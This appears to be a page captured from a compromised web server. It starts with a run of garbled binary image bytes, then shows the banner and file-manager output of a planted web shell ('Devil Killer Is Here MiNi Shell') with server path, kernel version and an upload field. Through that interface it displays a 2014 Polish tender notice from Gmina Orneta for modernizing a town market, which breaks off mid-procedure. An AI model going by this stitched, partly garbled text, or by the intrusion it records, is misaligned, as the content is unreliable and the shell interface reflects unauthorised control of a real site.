JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140312/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140312/83082-N-2014.html

<p class="kh_header"><b>Orneta: Modernizacja targowiska miejskiego przy ul. Wodnej w Ornecie.</b><br>
<b>Numer ogłoszenia: 83082 - 2014; data zamieszczenia: 12.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.orneta.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotryczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja targowiska miejskiego przy ul. Wodnej w Ornecie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  modernizacja targowiska miejskiego przy ul. Wodnej w Ornecie. 
2. Zakres rzeczowy przedmiotu zamówienia obejmuje:
1)   roboty branży wodno -kanalizacyjną w zakresie wykonania:
      a)  sieci wodociągowej 
      b)  sieci kanalizacji sanitarnej 
      c)  sieci kanalizacji deszczowej   
2)   roboty branży drogowej w zakresie wykonania:
      a) drogi nr 1
      b) drogi nr 2
      c) dodatkowych miejsc do handlu z samochodu przy drodze nr 1 (wg 
          zamiennego PZT)
      d) placu manewrowego
      e) parkingów 
      f)  terenu do handlu z samochodów
      g) terenów handlowych
      h) chodników
      i)  ścieżki (dojścia)
      j)  krawężników   
      k) powierzchni gromadzenia odpadów z ogrodzeniem 
3)   roboty branży elektrycznej w zakresie wykonania :
      a) zasilenia elektrycznego targowiska  
      b) sieci rozdzielczej targowiska  
      c) oświetlenia terenu
4)   wykonanie budynku sanitarnego w zakresie wykonania:
      a) fundamentów
      b) ścian nadziemia
      c) stropu, podciągów i nadproży
      d) konstrukcji i pokrycia dachu
      e) stolarki okiennej i drzwiowej 
      f)  tynków wewnętrznych i wykładzin ścian
      g) posadzek
      h) elementów zewnętrznych
      i)  malowania
      j) instalacji centralnego ogrzewania
      k) instalacji wodno - kanalizacyjnej
      l)  instalacji elektrycznej. 
5)   zagospodarowanie terenu w zakresie wykonania:
      a) ogrodzenia targowiska, koszy na śmieci, ławek
      b) zakupu i montażu straganów otwartych
      c) zieleni - trawników
      d) znaków drogowych

Uwaga: 
Droga nr 3, odcinek sieci kanalizacji deszczowej ( sieć kanalizacji deszczowej 
z rur PCV  250 od S19 do S22 + studnie S20, S21, S22) oraz, odcinek oświetlenia terenu ( punkt oświetleniowy C7 + linia zasilająca od C6 do C7) wg   zamiennego PZT i usunięcie kolizji z napowietrzną siecią niskiego napięcia nie są  objęte  przedmiotem zamówienia

3. Szczegółowy opis i zakres przedmiotu zamówienia został przedstawiony za pomocą: 
1)  Dokumentacji projektowej Rozdziału VIII SIWZ 
2)  Specyfikacji technicznej wykonania i odbioru robót  Rozdziału VII SIWZ
3)  Przedmiaru robót Rozdziału VI SIWZ
4)  Opisu przedmiotu zamówienia Rozdziału III SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp .  Wielkość zamówienia uzupełniającego do 20 % wartości zamówienia podstawowego.
Przewidywany zakres zamówienia uzupełniającego to m.in. droga nr 3, odcinek sieci kanalizacji deszczowej ( sieć kanalizacji deszczowej z rur PCV  250 od S19 do S22 + studnie S20, S21, S22) oraz odcinek oświetlenia terenu ( punkt oświetleniowy C7 + linia zasilająca od C6 do C7) wg zamiennego PZT.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.31.42-0, 45.23.31.20-6, 45.23.13.00-8, 45.30.00.00-0, 45.31.10.00-0, 45.31.61.00-6, 45.21.55.00-2, 45.11.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium Wysokość wadium 15 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał,  że w okresie ostatnich pięciu lat przed upływem terminu składania ofert , a  jeżeli okres prowadzenia działalności jest  krótszy  w  tym okresie wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej:    
a)  jedną lub dwie roboty budowlany polegającą na budowie, rozbudowie, przebudowie lub remoncie drogi lub/i ulicy lub/i chodników lub/i placu lub/i innych terenów  o nawierzchni z kostki betonowej i/lub kostki kamiennej , o łącznej powierzchni wykonanej nawierzchni w ramach 1 lub 2 umów min. 4 000 m2  oraz  
b)  jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie sieci kanalizacji deszczowej i/lub kanalizacji sanitarnej grawitacyjnej o łącznej długości wykonanej w ramach 1 umowy min. 0,300 km  oraz
c)  jedną robotę budowlaną polegającą na budowie, rozbudowie lub przebudowie budynku  o pow. użytkowej min. 80 m2  oraz
łączna wartość w/w robót budowlanych (lit. a)+ lit b) + lit.c)) nie mniejsza niż 1 200 000 zł brutto 

Zamawiający dopuszcza wykonanie w/w robót budowlanych wykazanych w lit. a), lit b) i lit.c,  w ramach jednej umowy lub w osobnych 2 lub 3 lub 4 umowach .  Łączna wartość w/w robót budowlanych (lit. a)+ lit b) +lit.c))  w ramach jednej umowy lub w osobnych 2 lub 3 lub 4 umowach  nie może być mniejsza niż 1 200 000 zł brutto.

Wykazane przez Wykonawcę roboty budowlane muszą być zakończone i odebrane przez ich zleceniodawców. 

Ocena spełnienia warunku nastąpi  na podstawie  załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 1 i 2 IDW tj 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo 
zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ
- wykazu robót budowlanych  wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie z  podaniem ich rodzaju i  wartości, daty i miejsca wykonania sporządzonego wg Załącznika nr   4 do IDW  oraz załączeniem dowodów dotyczących najważniejszych robót budowlanych  określających, czy  roboty te zostały wykonane w sposób należyty oraz wskazujących, czy ostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonaniu zamówienia posiadającymi  następujące kwalifikacje zawodowe i doświadczenie tj. 
a)   co najmniej  jedną osobą, która pełnić będzie funkcję kierownika budowy,  posiadającą co najmniej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej lub drogowej wydane na podstawie obecnie obowiązujących przepisów Prawa Budowlanego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa oraz posiadającą co najmniej 2 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub/i  kierownika robót w specjalności konstrukcyjno - budowlanej  lub/i drogowej 
b)  co najmniej  jedną osobą, która pełnić będzie funkcję kierownika robót specjalności konstrukcyjno -budowlanej,  posiadającą co najmniej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej wydane na podstawie obecnie obowiązujących przepisów Prawa Budowlanego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa oraz posiadającą co najmniej 2 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub/i  kierownika robót w specjalności konstrukcyjno - budowlanej  
c)  co najmniej  jedną osobą, która pełnić będzie funkcję kierownika robót drogowych,  posiadającą co najmniej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej wydane na podstawie obecnie obowiązujących przepisów Prawa Budowlanego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa oraz posiadającą co najmniej 2 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub/i  kierownika robót drogowych  
d)  co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót sanitarnych, posiadającą co najmniej: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych wydane na podstawie obecnie obowiązujących przepisów Prawa Budowlanego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa, 2 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub/i  kierownika robót sanitarnych.      
e)  co najmniej jedną osobą,  która pełnić będzie funkcję kierownika robót elektrycznych posiadającą co najmniej uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  wydane na podstawie obecnie obowiązujących przepisów Prawa Budowlanego lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub uprawniają do sprawowania samodzielnej funkcji na podstawie odrębnych przepisów prawa oraz posiadającą co najmniej 2 - letnie doświadczenie zawodowe w kierowaniu robotami budowlanymi na stanowisku kierownika budowy lub/i  kierownika robót elektrycznych. 
 
UWAGA: 
1)    Zamawiający dopuszcza możliwość połączenie wyżej wskazanych funkcji tj 
1 osoba może pełnić funkcję wymienioną w  lit.a) i/lub lit.b) i/lub lit. c) i/lub lit.d) i/lub e) pod warunkiem spełnienia przez osobę łączącą te funkcje wszystkich warunków wymaganych dla poszczególnych funkcji.
2)   Przez doświadczenie zawodowe (w przypadku stanowisk, dla których wymagane jest posiadanie uprawnień budowlanych) należy rozumieć okres od daty uzyskania stosownych uprawnień do daty składania oferty.

3)    Zamawiający,   określając   wymogi  dla  w/w    osób (tj. wymienionych lit. a), b), c), d)  i e)) w zakresie posiadanych uprawnień budowlanych wymaga uprawnień budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2013 poz. 1409 ) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 2006 nr 83 poz. 578 ze zm.). Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 nr 63, poz. 394). Na podstawie art. 104 ustawy Prawo budowlane osoby, które przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.

Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 1, 3 i 4  IDW  tj  
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ
 -  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i  wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami   sporządzonego wg  załącznika nr 5 do IDW 
-  oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia wymienione  w  załączniku nr 5 do IDW, posiadają  wymagane uprawnienia budowlane sporządzonego wg załącznika nr 6 do IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy  o którym mowa § 6 ust.1 pkt 1 IDW           
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  tj. 
-  oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW Rozdziału II SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Wykonawca wskazuje w wykazie roboty budowlane w zakresie niezbędnym do wykazania  spełnienia warunku wiedzy i doświadczenia opisanego w pkt. III.3.2 niniejszego ogłoszenia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)   Formularz oferty sporządzony wg Załącznika nr 1 do IDW Rozdziału II SIWZ
2)   Dowód wniesienia wadium
3)   Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie  wynika bezpośrednio ze złożonego w ofercie odpisu z  właściwego rejestru, a w przypadku  Wykonawców wspólnie ubiegających się o udzielenie zamowienia, dokument  ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia   albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia   publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
4)   Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć 
podwykonawcom  według załącznika nr 7 do IDW Rozdziału II SIWZ
5)   Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa  w rozumieniu przepisów o  zwalczaniu nieuczciwej konkurencji  sporządzone wg załącznika nr 8 do IDW Rozdziału II SIWZ
6)  Kosztorys ofertowy opracowany zgodnie z § 12 IDW wg Rozdziału V SIWZ i zawierający:
a) wypełnione zestawienie rzeczowo - finansowe sporządzone wg Załącznika Nr 1 Rozdziału  V SIWZ 
b)tabelę wartości elementów scalonych sporządzoną wg Załącznika Nr 2 Rozdziału  V SIWZ    
c)zbiorcze zestawienie rzeczowo -finansowe sporządzone wg załącznika nr 3 Rozdziału V SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
